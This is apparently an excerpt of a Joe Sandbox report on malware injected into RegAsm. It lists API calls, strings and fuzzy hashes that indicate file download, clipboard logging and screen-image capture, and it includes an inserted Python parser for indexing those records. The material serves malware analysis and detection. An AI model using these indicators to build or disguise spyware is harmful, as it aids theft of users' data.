                                                                                                                                                                                                  • Opcode Fuzzy Hash: da99ce07a65ee8677d8ac93a591fd61b9625802b74d6fe0f1994a45124a5708e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: CC41F671A00611ABFF21AB65CC41A5EB7A4DF45714F15456FF809CB282EB3CD8508799
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004425A0
                                                                                                                                                                                                  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00442620
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                   • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                   • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FileReadUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                  • String ID: t'`/
                                                                                                                                                                                                  • API String ID: 1834446548-2084328917
                                                                                                                                                                                                  • Opcode ID: 63e3d16b404f575aa2cabd211bb65ed10a332836ab9854fb79e18233395a9099
                                                                                                                                                                                                  • Instruction ID: 27c6b2887722bd8dd8fc110c7074932bdcd8c9000dde826a4c26c38167b381c7
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 63e3d16b404f575aa2cabd211bb65ed10a332836ab9854fb79e18233395a9099
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6341E831A00158ABEB20DF14CE80BE977B5EB48304F5585EAF54997241EBB9DDC2CF98
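The per-function records in this part of the report are what an analyst pivots on: the Opcode and Instruction fuzzy hashes identify the same routine across samples and reports, the API list says what the routine touches (here a ReadFile loop with a 0x1000-byte buffer, and below it SHCreateMemStream with GDI+ image load/save and the string image/jpeg), and the Memory Dump Source ties the routine to the injected RegAsm image at 0x400000. The parser below is an added example, not Joe Sandbox code or part of this report; it turns records in the textual layout shown on this page into dicts so they can be indexed by hash or searched by API. The SAMPLE text is a constructed excerpt copied from two records on this page, the "Download File" suffix it strips is the page's own download-widget text, and the helper names (parse_records, index_by_hash, records_calling) are the example's own.

```python
"""Parse Joe Sandbox per-function records ("APIs / Memory Dump Source /
Similarity" blocks) into dicts for hash pivoting and API search.

Added example, not part of the Joe Sandbox report or its tooling.
"""
import re

# Constructed sample: two records copied from this report's listing.
SAMPLE = """\
APIs
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004425A0
• ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00442620
Strings
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: FileReadUnothrow_t@std@@@__ehfuncinfo$??2@
• String ID: t'`/
• API String ID: 1834446548-2084328917
• Opcode ID: 63e3d16b404f575aa2cabd211bb65ed10a332836ab9854fb79e18233395a9099
• Instruction ID: 27c6b2887722bd8dd8fc110c7074932bdcd8c9000dde826a4c26c38167b381c7
• Opcode Fuzzy Hash: 63e3d16b404f575aa2cabd211bb65ed10a332836ab9854fb79e18233395a9099
• Instruction Fuzzy Hash: 6341E831A00158ABEB20DF14CE80BE977B5EB48304F5585EAF54997241EBB9DDC2CF98
APIs
• SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 00418AF9
  • Part of subcall function 00418691: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418B0C,00000000,?,?,?,?,00000000), ref: 004186A5
• SHCreateMemStream.SHLWAPI(00000000), ref: 00418B46
  • Part of subcall function 00418706: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B62,00000000,?,?), ref: 00418718
Strings
Memory Dump Source
• Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
Similarity
• API ID: Stream$GdipImage$Create$DisposeFromLoadSave
• String ID: image/jpeg
• API String ID: 1291196975-3785015651
• Opcode ID: 4c0baae4c0e9e9d16754b7ecd539cceb7e47a4de3878ce98d6afbfe1b810872b
• Instruction ID: 4d0b5c8bb5c89928ccad9adfa1773eea8e0f3015d74a4b244142dc53e7d0f70c
• Opcode Fuzzy Hash: 4c0baae4c0e9e9d16754b7ecd539cceb7e47a4de3878ce98d6afbfe1b810872b
"""

# "<name>.<MODULE>(<args>), ref: <addr>", optionally prefixed by the subcall note.
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<parent>[0-9A-Fa-f]+): )?"
    r"(?P<name>.+?)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$"
)
SOURCE_RE = re.compile(
    r"^(?P<file>\S+), Offset: (?P<offset>[0-9A-Fa-f]+), based on PE: (?P<pe>true|false)$"
)
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin",
            "Yara matches", "Similarity"}
RESIDUE = "Download File"  # web-page widget text glued onto dump file names


def _new_record():
    return {"apis": [], "source_file": None, "offset": None, "based_on_pe": None,
            "associated": [], "snapshot": None, "similarity": {}}


def parse_records(text):
    """Split the listing at each 'APIs' header and parse the bullets beneath."""
    records, rec, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTIONS:
            if line == "APIs":  # every function record opens with "APIs"
                rec = _new_record()
                records.append(rec)
            section = line
            continue
        if rec is None or not line.startswith("•"):
            continue
        item = line.lstrip("•").strip()
        key, _, value = item.partition(":")
        key, value = key.strip(), value.strip()
        if section == "APIs":
            m = API_RE.match(item)
            if m:
                d = m.groupdict()
                d["args"] = d["args"].split(",") if d["args"] else []
                rec["apis"].append(d)
        elif section == "Memory Dump Source":
            if key == "Source File" and (m := SOURCE_RE.match(value)):
                rec["source_file"] = m["file"]
                rec["offset"] = int(m["offset"], 16)
                rec["based_on_pe"] = m["pe"] == "true"
            elif key == "Associated":
                if value.endswith(RESIDUE):
                    value = value[: -len(RESIDUE)]
                rec["associated"].append(value)
        elif section == "Joe Sandbox IDA Plugin" and key == "Snapshot File":
            rec["snapshot"] = value
        elif section == "Similarity":
            rec["similarity"][key] = value  # "String ID" may legitimately be empty
    return records


def index_by_hash(records, key="Opcode Fuzzy Hash"):
    """Map a fuzzy hash to the records carrying it (pivot across reports)."""
    idx = {}
    for rec in records:
        h = rec["similarity"].get(key)
        if h:
            idx.setdefault(h, []).append(rec)
    return idx


def records_calling(records, api_name):
    """Records whose API list (direct or via a subcall) references api_name."""
    return [r for r in records if any(a["name"] == api_name for a in r["apis"])]


RECORDS = parse_records(SAMPLE)

if __name__ == "__main__":
    for r in RECORDS:
        print(r["similarity"].get("API ID"), "->", r["snapshot"], hex(r["offset"]))
```

Running it over a whole exported report gives one dict per routine; index_by_hash lets you check whether a routine's opcode hash has been seen in an earlier sample, and records_calling pulls every routine that reaches a given API, which is the quickest way to find where a dump's file-read or image-handling code lives.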
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 00418AF9
                                                                                                                                                                                                    • Part of subcall function 00418691: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418B0C,00000000,?,?,?,?,00000000), ref: 004186A5
                                                                                                                                                                                                  • SHCreateMemStream.SHLWAPI(00000000), ref: 00418B46
                                                                                                                                                                                                    • Part of subcall function 00418706: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B62,00000000,?,?), ref: 00418718
                                                                                                                                                                                                    • Part of subcall function 004186B4: GdipDisposeImage.GDIPLUS(?,00418BBD), ref: 004186BD
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                   • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                   • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                                                                                                                                                                  • String ID: image/jpeg
                                                                                                                                                                                                  • API String ID: 1291196975-3785015651
                                                                                                                                                                                                  • Opcode ID: 4c0baae4c0e9e9d16754b7ecd539cceb7e47a4de3878ce98d6afbfe1b810872b
                                                                                                                                                                                                  • Instruction ID: 4d0b5c8bb5c89928ccad9adfa1773eea8e0f3015d74a4b244142dc53e7d0f70c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4c0baae4c0e9e9d16754b7ecd539cceb7e47a4de3878ce98d6afbfe1b810872b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B5316D71604300AFC301EF65C884DAFBBE9EF8A304F00496EF985A7251DB7999048BA6
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 0040B7D2
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Init_thread_footer__onexit
                                                                                                                                                                                                  • String ID: [End of clipboard]$[Text copied to clipboard]
                                                                                                                                                                                                  • API String ID: 1881088180-3686566968
                                                                                                                                                                                                  • Opcode ID: bc6d6fd555eb74fb66702924759b933dd0787dde42f12c75391812bd244e7e16
                                                                                                                                                                                                  • Instruction ID: 844f446031992ee5170c212df839aebd4a436c67f2956c9e8fe8aff684c3a130
                                                                                                                                                                                                  • Opcode Fuzzy Hash: bc6d6fd555eb74fb66702924759b933dd0787dde42f12c75391812bd244e7e16
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 30217131A102198ACB14FBA6D8929EDB375AF54318F10443FE505771D2EF786D4ACA8C
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451E12,?,00000050,?,?,?,?,?), ref: 00451C92
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: ACP$OCP
                                                                                                                                                                                                  • API String ID: 0-711371036
                                                                                                                                                                                                  • Opcode ID: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                                                                                                                                                                                  • Instruction ID: 09b953eaa346ea86c897215e5a2a15a508f8bcb16f9b984b1dadcb699cf7d301
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 28d359b86f53a769e50845c8979a9c95ba506d3f4f520eddc938968d94c37ac1
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E821D862A80204A6DB36CF14C941BAB7266DB54B13F568426ED0AD7322F73BED45C35C
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0044B85B
                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0044BBEE,?,00000000,FF8BC35D,00000000,00000000,FF8BC369,00000000,0043CED4,?,?,?,83EC8B55,?,458B2CEC), ref: 0044B884
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorFileLastWrite
                                                                                                                                                                                                  • String ID: t'`/
                                                                                                                                                                                                  • API String ID: 442123175-2084328917
                                                                                                                                                                                                  • Opcode ID: b4fea6e3aa0460087ef2d68750ce9fbe5e545896456b0cd3d0a4536849d0b392
                                                                                                                                                                                                  • Instruction ID: 9972a58bdd01e134d13becd973f3089a2f7b3635eb9ddb95e5d59f4384582b5e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b4fea6e3aa0460087ef2d68750ce9fbe5e545896456b0cd3d0a4536849d0b392
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B2316F31A00619DBCB24DF59DD8099AF3F9FF48301B1485AAE909D7261E734ED81CBA8
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0044B76D
                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0044BC0E,?,00000000,FF8BC35D,00000000,00000000,FF8BC369,00000000,0043CED4,?,?,?,83EC8B55,?,458B2CEC), ref: 0044B796
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorFileLastWrite
                                                                                                                                                                                                  • String ID: t'`/
                                                                                                                                                                                                  • API String ID: 442123175-2084328917
                                                                                                                                                                                                  • Opcode ID: 090c291909642269157e163e4be0e237ed1934c8adebe135d2593af1985954e3
                                                                                                                                                                                                  • Instruction ID: c865f2f287ade0309940dd9d446f9ab1351fd896516eb6f8948e0fb5ca6ebdce
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 090c291909642269157e163e4be0e237ed1934c8adebe135d2593af1985954e3
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 69219435600219DFDB14CF69D980BEAB3F9EB48312F1048AAE94AD7251D734ED85CB64
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 00418BE5
                                                                                                                                                                                                    • Part of subcall function 00418691: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418B0C,00000000,?,?,?,?,00000000), ref: 004186A5
                                                                                                                                                                                                  • SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 00418C0A
                                                                                                                                                                                                    • Part of subcall function 00418706: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B62,00000000,?,?), ref: 00418718
                                                                                                                                                                                                    • Part of subcall function 004186B4: GdipDisposeImage.GDIPLUS(?,00418BBD), ref: 004186BD
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                                                                                                                                                                  • String ID: image/png
                                                                                                                                                                                                  • API String ID: 1291196975-2966254431
                                                                                                                                                                                                  • Opcode ID: 7a889f2deb852e9dca1466351ef9d9e2129164c9164a110dc5b22d8ef1cd3f8f
                                                                                                                                                                                                  • Instruction ID: 3c300d9a249dbea914adbc87700f03e6b767f6cab6163cd9bde1f728fb98d86d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7a889f2deb852e9dca1466351ef9d9e2129164c9164a110dc5b22d8ef1cd3f8f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: ED219071204211AFC701AB61CC88CBFBBACEFCA754F10052EF54693261DB399955CBA6
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405030
                                                                                                                                                                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                                                                                  • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405087
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: LocalTime
                                                                                                                                                                                                  • String ID: KeepAlive | Enabled | Timeout:
                                                                                                                                                                                                  • API String ID: 481472006-1507639952
                                                                                                                                                                                                  • Opcode ID: 1183f192522e4df64eb5f92206734bd19d1223fd61879706f910d0ae6d0fd28e
                                                                                                                                                                                                  • Instruction ID: e3b05ee6596aa2f5bef7afedc99ae4e94a3de8d8e2082a6dce2ef35069f0368d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1183f192522e4df64eb5f92206734bd19d1223fd61879706f910d0ae6d0fd28e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8D2104719107806BD700B736980A76F7B64E751308F44097EE8491B2E2EB7D5A88CBEF
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _abort
                                                                                                                                                                                                  • String ID: t'`$t'`/
                                                                                                                                                                                                  • API String ID: 1888311480-3252074118
                                                                                                                                                                                                  • Opcode ID: c57ab4ed64f00e106056ce3f8ac3d8d061a85ac74b2cfe95ae1eb400bd656163
                                                                                                                                                                                                  • Instruction ID: 3fe02070f8d2a70cab432f83213559668c8dc8cd07ffd2e3f30c78975cd7cd62
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c57ab4ed64f00e106056ce3f8ac3d8d061a85ac74b2cfe95ae1eb400bd656163
                                                                                                                                                                                                  • Instruction Fuzzy Hash: CD113A326207049BEB14AF79EC06B4D7790AB00B20F15402BF90D9B2C2DBB89C408A8C
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • Sleep.KERNEL32 ref: 0041667B
                                                                                                                                                                                                  • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166DD
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: DownloadFileSleep
                                                                                                                                                                                                  • String ID: !D@
                                                                                                                                                                                                  • API String ID: 1931167962-604454484
                                                                                                                                                                                                  • Opcode ID: 3ca3873f216e6dec9f51bfba94c2029cd2f9f9141924ab544fb725e976fd1afb
                                                                                                                                                                                                  • Instruction ID: 05e88009b36717a37a8ab5ea381c0ce1ab0270976c353b8abb87c8adb32aa340
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3ca3873f216e6dec9f51bfba94c2029cd2f9f9141924ab544fb725e976fd1afb
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F21142716083029AC614FF72D8969AE77A4AF50348F400C7FF546531E2EE3C9949C65A
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _strlen
                                                                                                                                                                                                  • String ID: : $Se.
                                                                                                                                                                                                  • API String ID: 4218353326-4089948878
                                                                                                                                                                                                  • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                                                                                                                  • Instruction ID: 66f447a9efa091531784e06c0e565222335d100d85517175c1dac28435e0d9bb
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2F11E7B5904249AEDB11DFA8D841BDEFBFCEF09244F104056E545E7252E6706B02C765
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0043506F
                                                                                                                                                                                                  • ___raise_securityfailure.LIBCMT ref: 00435156
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                                                                                                                  • String ID: t'`/
                                                                                                                                                                                                  • API String ID: 3761405300-2084328917
                                                                                                                                                                                                  • Opcode ID: abf8f162e72ac0f559f2fe09bf8d5ef75321946f9c80a09f1cd5255d70a828c3
                                                                                                                                                                                                  • Instruction ID: c499df361ad1c1a9c93393a24c16d6e92e8df025d99686d048565dfc03b89b9f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: abf8f162e72ac0f559f2fe09bf8d5ef75321946f9c80a09f1cd5255d70a828c3
                                                                                                                                                                                                  • Instruction Fuzzy Hash: ED21EDB9520200DBD724DF1DE992A843BA4FB08354F10503AED0C8B7B0E3B569C08F8D
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: LocalTime
                                                                                                                                                                                                  • String ID: | $%02i:%02i:%02i:%03i
                                                                                                                                                                                                  • API String ID: 481472006-2430845779
                                                                                                                                                                                                  • Opcode ID: 32400ea054816a1706cfb277acda767debc223c00efd77583625c389be65a1fa
                                                                                                                                                                                                  • Instruction ID: 036da7e0cd4114b6fa9428aab3af546923e8b827a5fb64715830670d2b1b9b5a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 32400ea054816a1706cfb277acda767debc223c00efd77583625c389be65a1fa
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 091190714082455AC304FB62D8519FFB3E9AB84348F50093FF88AA21E1EF3CDA45C69E
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0041ADCD
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ExistsFilePath
                                                                                                                                                                                                  • String ID: alarm.wav$hYG
                                                                                                                                                                                                  • API String ID: 1174141254-2782910960
                                                                                                                                                                                                  • Opcode ID: 58920c20f6ffe846cac49dfe65e500d8b6f0696205a2e0982ff2d29c29e4706d
                                                                                                                                                                                                  • Instruction ID: 4122455f09fb97d0238bc6f6df8f07100adf7eded08faacdf9dae369850c3b42
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 58920c20f6ffe846cac49dfe65e500d8b6f0696205a2e0982ff2d29c29e4706d
